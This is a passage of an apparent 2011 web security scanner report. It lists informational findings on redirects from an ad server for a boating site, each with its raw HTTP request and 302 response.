GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1811274780/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.marinalife.com/soundings
Content-Length: 311
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.marinalife.com/soundings">here</a>.<
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/181770509/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/181770509/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.marinalife.com/soundings

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/181770509/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:30:25 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.marinalife.com/soundings
Content-Length: 312
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.marinalife.com/soundings">here</a>.<
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1821719452/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1821719452/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1821719452/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:52:24 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1827438716/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1827438716/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1827438716/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:30:19 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.294. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1835285805/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1835285805/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1835285805/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1835285805/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:58:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1839652180/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1839652180/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1839652180/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:05:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1852755455/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1852755455/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.myonlinepubs.com/publication?i=59161

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1852755455/Right1/Dom_Ent/House-Sound-Btn/bs_de_ad_300x100.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:00:52 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.myonlinepubs.com/publication?i=59161
Content-Length: 323
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.myonlinepubs.com/publication?i=59161">here</a>
...[SNIP]...

20.297. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1868324146/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1868324146/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1868324146/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1868324146/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:45:16 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1881654176/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1881654176/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1881654176/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:44:40 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1882825683/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1882825683/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1882825683/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:45:08 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1885911438/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1885911438/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1885911438/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:01 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/188597572/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/188597572/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/188597572/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:57:08 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1897798837/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1897798837/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1897798837/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:13:18 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&i=2039">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1898634487/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1898634487/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1898634487/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:45:26 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1908811162/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1908811162/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1908811162/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:58:50 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1909625640/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1909625640/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x

The response contains the following link to another domain:

http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1909625640/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:16:50 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.306. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/19190715/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oasc05139.247realmedia.com
Path:	/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/19190715/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:

